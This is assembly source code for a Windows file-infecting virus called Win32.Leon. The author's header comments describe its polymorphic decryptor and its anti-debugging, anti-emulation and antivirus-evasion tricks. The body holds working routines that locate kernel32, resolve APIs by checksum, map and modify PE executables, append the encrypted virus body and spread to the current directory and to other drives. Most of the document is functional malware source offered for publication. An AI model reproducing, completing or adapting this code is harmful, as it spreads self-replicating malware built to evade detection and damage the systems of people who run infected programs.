Win32.Leon
kaze / FAT
<![CDATA[
;FICHIER : main.asm
;NOM : Win32.leon
;DATE : 14/01/2007
;VERSION : 1.0
;AUTEUR : kaze <kaze@lyua.org>
;SITE : http://fat.next-touch.com
; I'm happy to introduce to you win32.leon, a nearly original poly virus. This virus is
; mainly focused on AV-detection evading, so don't expect ultral33t spreading. The main
; technique of this is virus is "decryption via APIS", i.e the decryptor is (with a
; probability of 4/5) 100% api based. Some random fake api calls are also used in the
; decryptor: those apis are called with random arguments, but won't disturb the virus's
; excecution: they just return an error code (except when being debugged where they
; sometimes throw exceptions). Random api calls are also used in the virus body in order
; to avoid dynamic detection.
; A lot of little tricks are also used to fool emulators and scanners (like encryption
; through relocations, or decryptor fragementation) and are explained in the article
; stored at http://fat.next-touch.com/data/win32.leon.pdf (french only for now).
;===== WIN32.LEON =========================================================================
; OS: Win2000 and WinXP. Successfully tested on both. Won't work on vista because
; of the fake apis thingie.
; TYPE: PE Appender.
; TARGETS: Kaze*.exe PE files, with .code > ~10k and
; vsize(lastsection)<rawsize(lastsection)
; INFECTION: Insert virus body into last section. The decryptor is cut into X part, where
; X=number of api calls in the decryptor. Those parts are written in the .code
; section at random locations. The first part is located on the EP. If the
; decryptor used is api-based, the IAT of the host will also be modified by the
; virus. If encryption via relocs is used, relocations are modified and the
; host is relocated by the virus.
; SPREADING: Infect current directory and all physical drives. Avoid infection of
; SFC protected files.
; POLY/META: Polymorphic, using a kpasm-generated poly engine (rules in regles.kpasm).
; Use two decryptors (one at a time): a cryptoapis-based one and a simple
; xor loop.
; ANTIDBG: Yes. The decryptor and the virus body use a lot of "fake apis", i.e some
; apis with random arguments, that's won't do anything normally, but will
; throw some exception when debugged.
; ANTIEMUL: Yes. The decryptor is mainly composed of api calls. Most of the emulators
; don't emulate them all. Bogus api calls are also used (fake apis) in order
; to fool the emulator. The control flow in the decryptor is also a bit
; obfuscated: in order to jump from the K part to the K+1 part
; (in the decryptor), the emulator has to know the exact number of arguments
; of the api used in the K part. Up to 500 different fake apis could be used.
; ANTISCAN: Yes. Besides the poly, the virus sometimes uses encryption via
; relocations: the decryptor itself is encrypted by having some relocations
; pointing to the decryptor's code. The imagebase is modified to force windows
; to relocate the infected host (and so decrypt the decryptor). Relocations
; of the host are nulled and the host itsef is relocated by the virus.
; ANTIDYNAMIC: Yes. The sequence of the apis used by the virus body and the decryptor is
; random. Each virus api call is surrounded by up to 10 random fake apis calls.
; ANTIHEURIST: No. It may fool some but no original trick used.
; BUGS: Will crash every ~50 infections (don't ask me why). When crashing, the virus
; try to restore control to infected program through SEH.
;==========================================================================================
; Well, this virus has been finished in hurry, so some things could be improved. The poly
; engine for example is good, but could be easily improved. The payload also is a simple
; MessageBox: I coded a nice one (some animated monkey playing around with desktop's icons :),
; but hadn't time to integrate it into the virus. Just look at the web site for the payload,
; it's quite fun :D. I sent it to AVers three weeks ago, and only 3 detect it, but with a bad
; ratio (<70%). I think that's because they just don't care, it's a PoC after all. Well,
; i'll publish it anyway.
; Thankz to:
; - Baboon for the help with kpasm debugging
; - Poco for hosting this file
; - Squallsurf for the Vista VM
; - Silma for the motivation.
; - Tuna for the reading & correction of the paper
;
;And Greetz to all #fat,#nas and #uct members
.386p
.model flat,STDCALL
;===================================== MACROS =================================
call_ macro x
mov [ebp+sauve_reg_anti_call],edx
mov [ebp+sauve_reg_anti_call2],ebx
mov edx,[ebp+x]
call anti_call
mov edx,[ebp+sauve_reg_anti_call]
mov ebx,[ebp+sauve_reg_anti_call2]
endm
call_s macro x
call [ebp+x]
endm
debug macro x
pusha
mov eax,x
call printdec
popa
endm
debuga macro x
pusha
push 0
push x
push x
push 0
call_ MessageBox
popa
endm
;======================================= EQUS =================================
TAILLE_IMPORTS EQU 8092 ;devrait suffire pour la plupart des hôtes (env 50 dlls)
;doit etre alignee sur 4k!
TAILLE_API EQU 64
NB_DLLS_IMPORTEES EQU 1
FIRST_GEN_IMAGE_BASE EQU 400000h
DECRYPTOR_SIZE EQU 4096*4 ;decrypteur polymorphisé
MUTATED_DECRYPTOR_SIZE EQU 4096 ;pseudo-code modifié
VIRTUAL_SIZE_VIRUS EQU (((virus_len+heap_len + TAILLE_IMPORTS)/4096)+1)*4096+DECRYPTOR_SIZE
MAX_NB_PARTIES EQU 16 ;nombre max de parties pour le décrypteur
PARTIE_MAX_SIZE EQU DECRYPTOR_SIZE/MAX_NB_PARTIES
MAX_OPCODE_PAR_PARTIE EQU 20 ;sic
OPCODE_MAX_SIZE EQU PARTIE_MAX_SIZE/MAX_OPCODE_PAR_PARTIE
NB_CASES_MEMOIRE EQU 100 ;nombre de cases mémoires à réserver pour le poly
PROV_RSA_FULL EQU 1
CRYPT_NEWKEYSET EQU 8
CRYPT_VERIFYCONTEXT EQU 0F0000000h
CALG_RC4 EQU 06801h
CALG_MD5 EQU 08003h
TAILLE_CLE EQU 800000h
PAGE_EXECUTE_READWRITE EQU 040h
SECTION_MASK EQU 0C0000040h ;0F0000060h
SLEEPTIME_ON_INFECT_DIR EQU 1000
MAX_ENDROITS_INTERDIT EQU 512
MAX_RETRY EQU 50 ;nombre max d'essais pour trouver des trous dans l'hote
;!! MAX_APIS_IMPORTEES*TAILLE_API*2 < TAILLE_IMPORTS/2
MAX_APIS_IMPORTEES EQU MAX_REAL_APIS_IMPORTEES + MAX_FAKE_APIS_IMPORTEES +8
MAX_REAL_APIS_IMPORTEES EQU 5
MAX_FAKE_APIS_IMPORTEES EQU 20
SIGNATURE_VIRUS EQU 54
PROB_DECRYPTEUR_SIMPLE EQU 5
PROBA_ENCRYPTION_RELOCS EQU 5
NB_RELOCS_PAR_ILOT EQU 80 ;multiple de 32bits !
IMAGEBASE_DEFAUT EQU 10000h
;==================================== FIRST GEN DATA ==========================
extrn ExitProcess:PROC
extrn MessageBoxA:PROC
.data
Signature db "Win32.Leon coded by kaze",0
;======================================= CODE =================================
.code
start:
debut_virus:
;======================================= CORPS ================================
encrypt_cryptoapised_stuff:
call delta
delta: pop ebp
sub ebp,offset delta
; sauvegarde quelques variables
lea esi,[ebp+a_sauvegarder]
lea edi,[ebp+sauvegarde]
mov ecx,taille_sauvegarde
rep movsb
;reequilibrage de la pile
mov eax,[ebp+nb_fake_pushs]
shl eax,2
add esp,eax
; cherche l'adresse de kernel32
find_kernel:
mov edx,[esp]
mov ecx,100h
xor eax,eax
and dx,word ptr 0F000h
call seh
seh_handler:
mov esp,[esp+8]
mov ebx,[esp+4]
mov fs:[eax],ebx
jmp find_it
seh:
push dword ptr fs:[eax]
mov fs:[eax],esp
find_it:
sub edx,1000h
dec ecx
jz k32_not_found
cmp word ptr [edx],'ZM'
jnz find_it
mov ebx,[edx+03ch]
add ebx,edx
cmp word ptr [ebx],'EP'
jnz find_it
pop dword ptr fs:[eax]
pop eax
;récupère les apis de k32
lea esi,[ebp+liste_apis_k32] ;apis de k32
lea edi,[ebp+apis_k32]
call find_apis
;met en place le seh
call seh_virus
seh_handler_virus:
mov esp,[esp+8]
mov ebx,[esp+4]
mov fs:[eax],ebx
call delta3
delta3: pop ebp
sub ebp, offset delta3
jmp retour_hote
seh_virus:
xor eax,eax
push dword ptr fs:[eax]
mov fs:[eax],esp
;alloue la memoire
lea esi,[ebp+a_allouer]
lea edi,[ebp+variables_allouees]
mov ecx,nb_a_allouer
l_alloue:
push esi edi ecx
lodsd
push eax
push dword ptr 0
call_s LocalAlloc
pop ecx edi esi
test eax,eax
jz retour_hote
stosd
loop l_alloue
;obligatoire pour les fake apis dynamiques
call anti_call_init
;recupere l'adresse des autres apis
lea eax,[ebp+name_user32] ;apis de user32
push eax
call_ LoadLibrary
mov edx,eax
lea esi,[ebp+liste_apis_u32]
lea edi,[ebp+apis_u32]
call find_apis
lea eax,[ebp+name_a32] ;apis de advapi32
push eax
call_ LoadLibrary
mov edx,eax
lea esi,[ebp+liste_apis_a32]
lea edi,[ebp+apis_a32]
call find_apis
and [ebp+calc_chksum],dword ptr 0 ;CheckSumMappedFile (optionnel)
lea eax,[ebp+name_imagehlp]
push eax
call_ LoadLibrary
test eax,eax
jz no_image_help
lea ebx,[ebp+imagehlp_api]
push ebx
push eax
call_ GetProcAddress
mov [ebp+calc_chksum],eax
no_image_help:
and [ebp+sfc_protected],dword ptr 0 ;SfcIsfileProtected (optionnel)
lea eax,[ebp+name_sfc]
push eax
call_ LoadLibrary
test eax,eax
jz no_sfc
lea ebx,[ebp+sfc_api]
push ebx
push eax
call_ GetProcAddress
mov [ebp+sfc_protected],eax
no_sfc:
;================================ LANCEMENT DES THREADS =======================
call [ebp+GetTickCount]
mov [ebp+poly_rand_seed],eax
mov [ebp+RAND_SEED],eax
;infecte le rep courant
call infect_rep
;payload
call payload
;================================= RETOUR A L'HOTE ============================
retour_hote:
test ebp,ebp
jz retour_hote_prem_gen
call restaure_hote
retour_hote_prem_gen:
;lance la thread qui ifnecte tous les disques
lea esi,[ebp+infecte_disques]
call make_thread
jmp [ebp+sauve_ancien_ep]
k32_not_found:
jmp k32_not_found
;======================================= FONCTIONS ============================
include poly_defines.inc
include poly_assembleur.asm
include polymorphisation.asm
include fragmentation.asm
include fusion_imports.asm
include fake_apis.asm
include payload.asm
include relocation.asm
include infection.asm
;INFECTE_PE in: eax--> PE mappé en memoire
; out : none
infecte_pe proc near
pusha
mov edx,[eax+3Ch]
add edx,eax ;edx-->PE Header
mov ebx,eax ;ebx=file mapping offset
;reinit quelques trucs
xor eax,eax
mov edi,[ebp+adresses_interdites]
stosd
mov [ebp+offset locations],dword ptr eax
;cherche la dernière section
mov [edx+0B0h],eax ;marque d'infection
lea esi,[edx+18h]
movzx ecx, word ptr [edx+14h] ;SizeOfOptionalHeader
add esi,ecx ;esi-->sections
movzx ecx,word ptr [edx+06h]
cherche_derniere_sec:
cmp [esi+12],eax
jb ch2
mov eax,[esi+12]
mov edi,esi
ch2: add esi,28h
loop cherche_derniere_sec
mov ecx,[edi+8] ;ecx=VSize
cmp ecx,[edi+16]
ja infecte_pe_fin ;si vsize>rawsize infecte pas
call encryption_relocs_init
;les modifs d'usage
mov ecx,[edx+28h] ;entry point (rva)
add ecx,[ebp+imagebase] ;entry point(va)
mov [ebp+ancien_ep],ecx
;edi-->header derniere section (en ram)
add eax,[edi+8] ;ajoute VSize (eax etait = a RVA section)
mov [ebp+infection_rva],eax
add eax,[ebp+imagebase]
mov [ebp+virus_start_va],eax
mov esi,[edi+20] ;RawAddress
add esi,[edi+8] ;VirtualSize
add esi,ebx ;adresse du filemapping
mov [ebp+infection_raw],esi
mov eax,[ebp+taille_virus_alignee]
add [edi+8],dword ptr VIRTUAL_SIZE_VIRUS
add [edi+16],eax ;RawSize
or [edi+36],SECTION_MASK
;remplit la table des adresse interdites
call evite_adresses
;choisit un décrypteur parmis les deux dispos
call poly_choisit_decrypteur
xor eax,eax
cmp [ebp+poly_name_dll],eax
jz detourne_pas_iat
;modifie l'iat pour importer les apis du decrypteur + les fake apis
mov eax,[edx+80h] ;RVA de l'IAT
call rva2raw
mov esi,eax
add esi,ebx ;esi=raw imports
mov ecx,[edx+84h] ;ecx=size imports
mov edi,[ebp+infection_raw] ;edi=raw addresse du virus (pas encore le code à ce niveau là, mais l'iat)
call imports_init ;détourne l'iat
mov eax,[ebp+poly_name_dll]
call add_iid_decrypteur ;ajoute le iid
lea esi,[ebp+iat_crypto_decrypteur]
call deal_imports ;importe les apis + les fake apis du dll
detourne_pas_iat:
;cherche les fake apis (des autres dll) importées par l'hote
lea esi,[ebp+liste_fake_apis]
lea edi,[ebp+fake_apis]
call find_fake_apis
mov [ebp+nb_fake_apis],eax
;pseudo-poly le decrypteur (ajoute des fake apis calls)
movzx eax,byte ptr [ebp+poly_nb_parties_decrypteur]
mov edi,[ebp+mutated_pseudo_decrypteur]
mov esi,[ebp+poly_decrypteur]
call poly_pseudo_polymorphize
;poly_nb_parties_decrypteur modifié
;trouve X plages d'adresse de MAX_PARTIE_SIZE octets que l'on peut overwriter
push ebx
mov ebx,PARTIE_MAX_SIZE
movzx ecx,byte ptr [ebp+poly_nb_parties_decrypteur]
call trouve_adresses ;trouve poly_nb_parties_decrypteur endroits de PARTIE_MAX_SIZE octets chacuns
pop ebx
test eax,eax
jz infecte_pas
call sauvegarde_hote
;assemble et ecrit le decrypteur aux endroit maintenant sauvegardes
mov esi,[ebp+mutated_pseudo_decrypteur]
call poly_polymorphise
;encryption via les relocs
call encryption_relocs
;ecrit le code du virus
mov edi,[ebp+infection_raw]
add edi,TAILLE_IMPORTS + DECRYPTOR_SIZE ; edi = raw adresse du code du virus
push edi
lea esi,[ebp+debut_virus]
mov ecx,virus_len
rep movsb
pop edi
;encrypte le code du virus
call [ebp+fonction_encryption]
infecte_pas:
add [edx+50h],dword ptr VIRTUAL_SIZE_VIRUS
mov ecx,[ebp+calc_chksum]
jecxz infecte_pe_fin ;si CheckSumpMappedFile non present ...
lea esi,[ebp+checksum]
push esi
lea eax,[esi+4]
push eax
push dword ptr [ebp+WFD_nFileSizeLow]
push ebx
call ecx
;eax--> PE_Header mappé en RAM
mov ecx,[esi]
mov [eax+58h],ecx ;enregistre la nouvelle checksum
infecte_pe_fin:
popa
ret
infecte_pe endp
;RVA2RAW : in : eax=rva ,edx-->pe_header
; out : eax=raw adress
rva2raw proc near
push esi
push ebx
push ecx
lea esi,[edx+18h]
movzx ecx,word ptr [edx+14h] ;SizeOfOptionalHeader
add esi,ecx ;esi-->sections
movzx ecx,word ptr [edx+06h]
cherche_sec2:
mov ebx,[esi+12]
cmp ebx,eax
ja ch4
add ebx,[esi+8]
cmp [esi+8],dword ptr 0
jnz vsize_ok
add ebx,[esi+16] ;raw size
vsize_ok:
cmp ebx,eax
ja found2
ch4: add esi,28h
loop cherche_sec2
found2: mov ebx,[esi+12]
sub eax,ebx
add eax,[esi+20]
pop ecx
pop ebx
pop esi
ret
rva2raw endp
;SECTION_INFO : in : eax=rva ,edx-->pe_header
; out : eax--> section header
section_info proc near
push esi
push ecx
push ebx
lea esi,[edx+18h]
movzx ecx, word ptr [edx+14h] ;SizeOfOptionalHeader
add esi,ecx ;esi-->sections
movzx ecx,word ptr [edx+06h]
cherche_sec:
or [esi+36],SECTION_MASK
mov ebx,[esi+12]
cmp ebx,eax
ja ch3
add ebx,[esi+8]
cmp [esi+8],dword ptr 0
jnz vsize_ok2
add ebx,[esi+16] ; raw size
vsize_ok2:
cmp ebx,eax
ja found
ch3: add esi,28h
loop cherche_sec
found:
mov eax,esi
pop ebx
pop ecx
pop esi
ret
section_info endp
;CHECK_INFECTION : check si l'hote a déjà été visité
; in : edx--> PE header
; out : ecx!=0 si deja infecté
check_and_set_infection proc near
mov ecx,[edx+8] ;timestamp
cmp ch,SIGNATURE_VIRUS
jz deja_infecte
mov ch,SIGNATURE_VIRUS
mov [edx+8],ecx
xor ecx,ecx
deja_infecte:
ret
check_and_set_infection endp
;IS_SFC : check si sfc protected
;in : ebx->filename
;out: ecx!= si sfc protected
is_sfc proc near
push eax edx esi edi
xor ecx,ecx
push ecx
lea eax,[ebp+Buffer]
push eax
push dword ptr 260
push ebx
call_ GetFullPathName
push dword ptr 260*2
lea eax,[ebp+Buffer2]
push eax
xor eax,eax
dec eax
push eax
lea eax,[ebp+Buffer]
push eax
xor eax,eax
push eax
push eax
call_ MultiByteToWideChar
lea eax,[ebp+Buffer2]
push eax
xor eax,eax
push eax
call [ebp+sfc_protected]
mov ecx,eax
pop edi esi edx eax
ret
is_sfc endp
;INFECTION : in : ebx--> Filename, WFD rempli avec un .exe
; out : none
infection proc near
pusha
push 80h ;ATTRIB_NORMAL
push ebx
call_ SetFileAttributes
;teste si SFC
cmp [ebp+sfc_protected],dword ptr 0
jz pas_sfc_api
call is_sfc
test ecx,ecx
jnz pasbon
pas_sfc_api:
xor eax,eax
push eax
push eax
push 3
push eax
inc eax
push eax
push 0C0000000h
push ebx
call_ CreateFile
inc eax
jz peuxpas
dec eax
mov [ebp+Fhandle],eax
mov edi,[ebp+WFD_nFileSizeLow]
call create_mapped_file
test eax,eax
jz mappas
mov [ebp+Mhandle],eax
call map_file ; eax=map_offset
test eax,eax
jz veuxpas
mov esi,[eax+3Ch]
cmp esi,edi
jae pasbon ;si pas PE, evite les violation de pages
add esi,eax
cmp dword ptr [esi],'EP'
jnz pasbon
cmp dword ptr [esi+84h],TAILLE_IMPORTS/2+NB_DLLS_IMPORTEES*14h
jae pasbon
mov edx,esi
call check_and_set_infection
test ecx,ecx
jnz pasbon
mov ecx,[esi+34h]
mov [ebp+imagebase],ecx
mov esi,[esi+3Ch] ;File Alignement
push eax
call_ UMVOFile
push [ebp+Mhandle]
call_ CloseHandle
xor edx,edx
mov eax,virus_len+TAILLE_IMPORTS+DECRYPTOR_SIZE ;edi=fichier+virus
div esi
inc eax
mul esi
mov [ebp+taille_virus_alignee],eax
add edi,eax
call create_mapped_file
mov [ebp+Mhandle],eax
call map_file ; eax=map_offset
call infecte_pe
pasbon: push eax
call_ UMVOFile
veuxpas:push [ebp+Mhandle]
call_ CloseHandle
mappas: push [ebp+Fhandle]
call_ CloseHandle
peuxpas:push dword ptr [ebp+WFD_dwFileAttributes]
push ebx
call_ SetFileAttributes
popa
ret
infection endp
;FIND_APIS: in: esi--> ckecksums(terminé par -1) edi--> apis[] edx=HMODULE*
; out: edi[] rempli
find_apis proc near
mov ebx,[edx+3ch]
add ebx,edx ; ebx--> PE Header
mov ecx,[ebx+78h]
add ecx,edx ; ecx--> export table
mov eax,[ecx+01ch] ; sauve les adresses des tables
add eax,edx
lea ebx,[ebp+lst_fnc] ; liste des adresses de fonctions
mov [ebx],eax
add ebx,4
mov eax,[ecx+24h] ; liste des ordinals
add eax,edx
mov [ebx],eax
mov ebx,[ecx+20h] ; ebx-->liste des noms
xor ecx,ecx
add ebx,edx
fa1: mov eax,[ebx+ecx*4]
add eax,edx
call calc_crc
cmp eax,[esi] ; est-ce la fonction recherchée ?
jz fa2
inc ecx
jmp fa1
fa2: push esi
mov esi,[ebp+lst_ord] ; choppe l'ordinal (marche en //)
movzx eax,word ptr [esi+ecx*2]
mov esi,[ebp+lst_fnc] ; et on s'en sert pour chopper l'adresse de l'api
mov eax,[esi+eax*4]
add eax,edx ; (RVA)
stosd ; on la stock
pop esi
inc ecx
add esi,4 ; api suivante
inc dword ptr [esi] ; esi==0xFFFFFFF ?
jz fa3
dec dword ptr[esi]
jmp fa1
fa3: dec dword ptr[esi]
ret
find_apis endp
;CALC_CRC: in: eax--> apiname
; out: eax=crc
calc_crc proc near
push ecx
push esi
mov esi,eax
xor eax,eax
sub ecx,ecx
cc1: lodsb
test al,al
jz cc2
add cl,al
rol eax,cl
add ecx,eax
jmp cc1
cc2: mov eax,ecx
pop esi
pop ecx
ret
calc_crc endp
;INFECT_REP in : none
; out : none
infect_rep proc near
pusha
lea esi,[ebp+WFD]
lea eax,[ebp+mask] ;.exe
test ebp,ebp
jnz pas_premiere_gen
lea eax,[ebp+mask_pg] ;kaze*.exe
pas_premiere_gen:
push esi
push eax
call_ FindFirstFile
inc eax
jz badrep
dec eax
mov [ebp+Shandle],eax
unautreverre?:
lea ebx,[ebp+WFD_szFileName]
mov ecx,[ebp+sfc_protected]
jecxz bypass_sfc
; TODO : sfc check
bypass_sfc:
call infection
pas_touche:
lea eax,[ebp+WFD]
push eax
push [ebp+Shandle]
call_ FindNextFile
test eax,eax ;dernier fichier ?
jnz unautreverre?
push [ebp+Shandle]
call_ FindClose
badrep:
popa
ret
infect_rep endp
;MAP_FILE : in: edi=taille
; out: none
map_file proc near
xor eax,eax
push edi
push eax
push eax
push 00000002h
push [ebp+Mhandle]
call_ MVOFile
ret
map_file endp
;CREATE_MAPPED_FILE : in : edi=taille
; out : none
create_mapped_file proc near
xor eax,eax
push eax
push edi
push eax
push 00000004h
push eax
push [ebp+Fhandle]
call_ CreateFileMapping
ret
create_mapped_file endp
make_thread proc near ;esi--> debut de la thread
pusha
xor edx,edx
lea eax,[ebp+vtmp1]
push eax
push edx
lea eax,[ebp+vtmp2]
push eax
push esi
push edx
push edx
call [ebp+CreateThread]
popa
ret
make_thread endp
fin_dyn_fake_apis:
;======================================= DATA =================================
a_allouer:
dd DECRYPTOR_SIZE
dd MUTATED_DECRYPTOR_SIZE
dd MAX_ENDROITS_INTERDIT*2*4
dd XOR_LOOP_SIZE
nb_a_allouer equ ($-offset a_allouer)/4
a_sauvegarder:
ancien_ep dd offset first_gen
imagebase dd FIRST_GEN_IMAGE_BASE
a32_oft dd 0
a32_ft dd 0
locations dd MAX_NB_PARTIES*2+1 dup (0)
infection_rva dd 0
poly_nb_parties_decrypteur db 0
fake_apis dd 2*NB_FAKE_APIS dup (?)
nb_fake_apis dd ?
taille_sauvegarde equ $ - a_sauvegarder
RAND_SEED dd 45980131
signature db "win32.leon by kaze",0
disque db "B:\",0
dmask db "*",0
dotdot db "..",0
mask db "kaze*.exe",0
mask_pg db "kaze*.exe",0
name_user32 db 'user32.dll',0
name_imagehlp db 'imagehlp.dll',0
imagehlp_api db 'CheckSumMappedFile',0
name_sfc db 'sfc.dll',0
sfc_api db 'SfcIsFileProtected',0
name_a32 db 'ADVAPI32.DLL',0
msg db 'Infecté',0
nb_fake_pushs dd 0 ; pour reequilibrer la pile
cle_anti_call db 35h
liste_apis_k32:
dd 0FDBE9DDFh ; CloseHandle
dd 04B00FBA1h ; CreateFileA
dd 00D6EA22Eh ; CreateFileMappingA
dd 0BE307C51h ; CreateThread
dd 04E5DE044h ; ExitThread
dd 0BE7B8631h ; FindClose
dd 0C915738Fh ; FindFirstFileA
dd 08851F43Dh ; FindNextFileA
dd 028F8C6FBh ; GetCurrentDirectoryA
dd 09C3A5210h ; GetDriveTypeA
dd 06B1C08DAh ; GetFullPathNameA
dd 040BF2F84h ; GetProcAddress
dd 08FAF830Bh ; GetTickCount
dd 05D0915E3h ; GetWindowsDirectoryA
dd 095765835h ; LoadLibraryA
dd 01064BF83h ; LocalAlloc
dd 032BEDDC3h ; MapViewOfFile
dd 09588EE13h ; MultiByteToWideChar
dd 08E0E5487h ; SetCurrentDirectoryA
dd 050665047h ; SetFileAttributesA
dd 03A00E23Bh ; Sleep
dd 0FAE00D65h ; UnmapViewOfFile
dd 0065F101Ah ; VirtualProtect
dd 0FFFFFFFFh
liste_apis_u32:
dd 0C0059B5Fh ; MessageBoxA
dd 0FFFFFFFFh
liste_apis_a32:
dd 0B4060931h ; CryptAcquireContextA
dd 08320BDFEh ; CryptCreateHash
dd 01437CBF2h ; CryptDecrypt
dd 09BB3B145h ; CryptDeriveKey
dd 0A6889767h ; CryptEncrypt
dd 0C66A7A58h ; CryptHashData
dd 0FFFFFFFFh
code_to_crypt_len equ ($ - debut_virus)
memoire:
dd NB_CASES_MEMOIRE dup (0)
virus_len equ ($ - debut_virus)
;======================================= BSS ==================================
align dword
; KERNEL32.DLL
apis_k32:
CloseHandle dd ?
CreateFile dd ?
CreateFileMapping dd ?
CreateThread dd ?
ExitThread dd ?
FindClose dd ?
FindFirstFile dd ?
FindNextFile dd ?
GetCurrentDirectory dd ?
GetDriveType dd ?
GetFullPathName dd ?
GetProcAddress dd ?
GetTickCount dd ?
GetWindowsDirectory dd ?
LoadLibrary dd ?
LocalAlloc dd ?
MVOFile dd ?
MultiByteToWideChar dd ?
SetCurrentDirectory dd ?
SetFileAttributes dd ?
Sleep dd ?
UMVOFile dd ?
VProtect dd ?
; USER32.DLL
apis_u32:
MessageBox dd ?
; ADVAPI32.DLL
apis_a32:
CAcquireContextA dd ?
CCreateHash dd ?
CDecrypt dd ?
CDeriveKey dd ?
CEncrypt dd ?
CHashData dd ?
;DIVERS
lst_fnc dd ?
lst_ord dd ?
lst_noms dd ?
Fhandle dd ?
Mhandle dd ?
Shandle dd ?
WFD label byte
WFD_dwFileAttributes dd ?
WFD_ftCreationTime dd ?
dd ?
WFD_ftLastAccessTime dd ?
dd ?
WFD_ftLastWriteTime dd ?
dd ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db 260 dup (?)
WFD_szAlternateFileName db 13 dup (?)
db 03 dup (?)
SavedDirectory db 260 dup (?)
Buffer db 260 dup (?)
Buffer2 db 260*2 dup (?)
infection_raw dd ?
virus_start_va dd ?
iat_noms_apis_rva dd ?
iat_noms_apis_raw dd ?
taille_virus_alignee dd ?
sfc_protected dd ?
calc_chksum dd ?
checksum dd ?
old_checksum dd ?
fonction_encryption dd ?
poly_decrypteur dd ?
poly_name_dll dd ?
poly_liste_apis_compat dd ?
poly_nb_apis_compat dd ?
poly_buffer db 256 dup (?)
simple_cle dd ?
vtmp1 dd ?
vtmp2 dd ?
vtmp3 dd ?
vtmp4 dd ?
index_iat dd MAX_APIS_IMPORTEES dup (?)
relocated_imagebase dd ?
is_relocated db 0
;=================== VARIABLES SAUVEGARDEES =================
sauvegarde:
sauve_ancien_ep dd ?
sauve_imagebase dd ?
s_a32_oft dd ?
s_a32_ft dd ?
sauve_locations dd MAX_NB_PARTIES*2+1 dup (?)
sauve_infection_rva dd ?
sauve_nb_parties db ?
; FAKE APIS
sauve_fake_apis dd 2*NB_FAKE_APIS dup (?)
sauve_nb_fake_apis dd ?
; FUSION IMORTS
;=================== VARIABLES ALLOUEES =================
variables_allouees:
decrypteur dd ?
mutated_pseudo_decrypteur dd ?
adresses_interdites dd ?
xor_loop_location dd ?
heap_len equ ($ - debut_virus) - virus_len
;================= PREMIERE GENERATION ==================
first_gen:
mov eax,virus_len
call printdec
call ExitProcess,0
printdec proc near ;c vite-fait ...
pusha
cld
lea edi,buf
mov ebx,10
xor ecx,ecx
GUI_printdec_1:
xor edx,edx
div ebx
push edx
inc ecx
test eax,eax
jnz GUI_printdec_1
GUI_prindec_2:
pop eax
add eax,48
stosb
loop GUI_prindec_2
xor eax,eax
stosb
push eax
push offset Signature
push offset buf
push eax
call MessageBoxA
popa
ret
printdec endp
buf db 20 dup (?)
end start
]]>